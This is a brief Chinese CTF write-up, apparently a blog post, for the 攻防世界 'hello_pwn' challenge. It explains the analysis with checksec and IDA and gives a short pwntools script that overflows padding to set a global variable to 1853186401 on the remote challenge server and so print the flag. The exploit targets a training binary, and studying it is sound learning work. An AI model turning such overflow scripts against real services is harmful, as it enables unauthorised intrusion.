攻防世界—pwn—hello_pwn

题目分析

下载文件后首先使用checksec检查文件保护机制

使用ida查看伪代码


思路明确,让dword_60106C == 1853186401即可输出flag

信息收集

偏移量

sub_400686函数地址

编写脚本

from pwn import *

p = remote('111.198.29.45',36884)
#p = process("./pwn002")
payload = "A"*4 + p64(1853186401)
p.sendline(payload)
p.interactive()

本地测试

靶机测试

posted @ 2020-04-03 19:12  anweilx  阅读(581)  评论(0编辑  收藏  举报